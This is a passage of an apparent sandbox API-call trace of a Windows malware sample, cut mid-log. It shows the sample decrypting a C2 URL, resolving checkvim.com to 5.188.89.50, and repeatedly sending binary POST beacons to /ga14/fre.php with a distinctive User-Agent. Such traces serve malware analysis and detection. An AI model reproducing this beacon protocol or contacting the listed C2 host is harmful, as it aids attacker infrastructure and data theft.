(HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0289.736] GetProcessHeap () returned 0x840000 [0289.736] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0289.737] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0289.739] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0289.739] GetProcessHeap () returned 0x840000 [0289.739] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0289.739] GetProcessHeap () returned 0x840000 [0289.739] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0289.739] GetProcessHeap () returned 0x840000 [0289.739] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f758 [0289.739] GetProcessHeap () returned 0x840000 [0289.739] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0289.740] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0289.741] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0289.741] GetProcessHeap () returned 0x840000 [0289.741] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0289.741] GetProcessHeap () returned 0x840000 [0289.741] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0289.741] send (s=0x488, buf=0x873a58*, len=237, flags=0) returned 237 [0289.741] send (s=0x488, buf=0x87eb58*, len=159, flags=0) returned 159 [0289.741] GetProcessHeap () returned 0x840000 [0289.741] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0289.741] recv (in: s=0x488, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0290.095] GetProcessHeap () returned 0x840000 [0290.095] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0290.095] GetProcessHeap () returned 0x840000 [0290.095] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0290.095] GetProcessHeap () returned 0x840000 [0290.095] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0290.095] GetProcessHeap () returned 0x840000 [0290.095] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0290.095] closesocket (s=0x488) returned 0 [0290.096] GetProcessHeap () returned 0x840000 [0290.096] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c48 | out: hHeap=0x840000) returned 1 [0290.096] GetProcessHeap () returned 0x840000 [0290.096] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0290.096] GetProcessHeap () returned 0x840000 [0290.096] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0290.097] GetProcessHeap () returned 0x840000 [0290.097] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0290.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x46c) returned 0x488 [0290.104] Sleep (dwMilliseconds=0xea60) [0290.130] GetProcessHeap () returned 0x840000 [0290.130] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fab8 [0290.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.130] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0290.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.135] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fdf8) returned 1 [0290.139] GetProcessHeap () returned 0x840000 [0290.139] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0290.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.140] CryptImportKey (in: hProv=0x86fdf8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0290.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.141] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0290.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.142] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.142] GetProcessHeap () returned 0x840000 [0290.142] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0290.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.142] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fab8, pdwDataLen=0x19f9a4 | out: pbData=0x87fab8, pdwDataLen=0x19f9a4) returned 1 [0290.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.143] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0290.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.144] CryptReleaseContext (hProv=0x86fdf8, dwFlags=0x0) returned 1 [0290.144] GetProcessHeap () returned 0x840000 [0290.144] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0290.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.145] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0290.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.145] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0290.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.146] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0290.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.147] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0290.147] GetProcessHeap () returned 0x840000 [0290.147] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0290.147] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0290.147] GetProcessHeap () returned 0x840000 [0290.147] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0290.147] GetProcessHeap () returned 0x840000 [0290.147] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0290.147] GetProcessHeap () returned 0x840000 [0290.147] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0290.147] GetProcessHeap () returned 0x840000 [0290.147] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0290.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.148] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0290.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.151] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0290.155] GetProcessHeap () returned 0x840000 [0290.155] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0290.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.156] CryptImportKey (in: hProv=0x86f710, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0290.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.157] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0290.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.157] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.157] GetProcessHeap () returned 0x840000 [0290.157] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0290.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.158] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0290.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.159] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0290.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.160] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0290.160] GetProcessHeap () returned 0x840000 [0290.160] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0290.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.162] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0290.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.162] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0290.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.163] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0290.163] GetProcessHeap () returned 0x840000 [0290.163] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0290.163] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0290.164] GetProcessHeap () returned 0x840000 [0290.164] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0290.164] socket (af=2, type=1, protocol=6) returned 0x48c [0290.164] connect (s=0x48c, name=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0290.233] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789f8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0290.233] GetProcessHeap () returned 0x840000 [0290.233] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fe80 [0290.233] GetProcessHeap () returned 0x840000 [0290.233] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0290.235] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0290.236] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0290.237] GetProcessHeap () returned 0x840000 [0290.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0290.237] GetProcessHeap () returned 0x840000 [0290.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0290.237] GetProcessHeap () returned 0x840000 [0290.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0290.237] GetProcessHeap () returned 0x840000 [0290.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0290.238] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0290.240] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0290.240] GetProcessHeap () returned 0x840000 [0290.240] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0290.240] GetProcessHeap () returned 0x840000 [0290.240] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0290.240] send (s=0x48c, buf=0x873a58*, len=237, flags=0) returned 237 [0290.242] send (s=0x48c, buf=0x87eb58*, len=159, flags=0) returned 159 [0290.242] GetProcessHeap () returned 0x840000 [0290.242] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0290.242] recv (in: s=0x48c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0290.592] GetProcessHeap () returned 0x840000 [0290.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0290.592] GetProcessHeap () returned 0x840000 [0290.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0290.592] GetProcessHeap () returned 0x840000 [0290.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0290.592] GetProcessHeap () returned 0x840000 [0290.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fe80 | out: hHeap=0x840000) returned 1 [0290.593] closesocket (s=0x48c) returned 0 [0290.593] GetProcessHeap () returned 0x840000 [0290.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0290.593] GetProcessHeap () returned 0x840000 [0290.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0290.593] GetProcessHeap () returned 0x840000 [0290.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0290.593] GetProcessHeap () returned 0x840000 [0290.593] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0290.593] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xa80) returned 0x48c [0290.602] Sleep (dwMilliseconds=0xea60) [0290.618] GetProcessHeap () returned 0x840000 [0290.618] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0290.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.620] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0290.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.638] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0290.645] GetProcessHeap () returned 0x840000 [0290.645] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0290.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.646] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e570) returned 1 [0290.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.647] CryptSetKeyParam (hKey=0x87e570, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0290.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.648] CryptSetKeyParam (hKey=0x87e570, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.648] GetProcessHeap () returned 0x840000 [0290.648] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0290.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.651] CryptDecrypt (in: hKey=0x87e570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0290.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.658] CryptDestroyKey (hKey=0x87e570) returned 1 [0290.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.659] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0290.659] GetProcessHeap () returned 0x840000 [0290.659] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0290.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.661] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0290.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.662] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0290.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.663] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0290.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.664] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0290.664] GetProcessHeap () returned 0x840000 [0290.664] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871538 [0290.664] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0290.665] GetProcessHeap () returned 0x840000 [0290.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871538 | out: hHeap=0x840000) returned 1 [0290.665] GetProcessHeap () returned 0x840000 [0290.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0290.665] GetProcessHeap () returned 0x840000 [0290.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0290.665] GetProcessHeap () returned 0x840000 [0290.666] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0290.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.667] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0290.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.672] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0290.679] GetProcessHeap () returned 0x840000 [0290.679] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0290.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.680] CryptImportKey (in: hProv=0x86f8a8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0290.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.681] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0290.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.682] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0290.682] GetProcessHeap () returned 0x840000 [0290.682] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0290.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.683] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0290.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.684] CryptDestroyKey (hKey=0x87e370) returned 1 [0290.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0290.685] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0290.685] GetProcessHeap () returned 0x840000 [0290.685] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0290.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.686] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0290.687] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.687] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0290.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0290.688] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0290.688] GetProcessHeap () returned 0x840000 [0290.689] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0290.689] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0290.692] GetProcessHeap () returned 0x840000 [0290.692] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0290.692] socket (af=2, type=1, protocol=6) returned 0x490 [0290.692] connect (s=0x490, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0290.770] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0290.770] GetProcessHeap () returned 0x840000 [0290.770] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0290.770] GetProcessHeap () returned 0x840000 [0290.770] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0290.770] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0290.771] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0290.771] GetProcessHeap () returned 0x840000 [0290.771] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0290.771] GetProcessHeap () returned 0x840000 [0290.771] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0290.771] GetProcessHeap () returned 0x840000 [0290.771] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0290.771] GetProcessHeap () returned 0x840000 [0290.771] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0290.772] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0290.773] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0290.773] 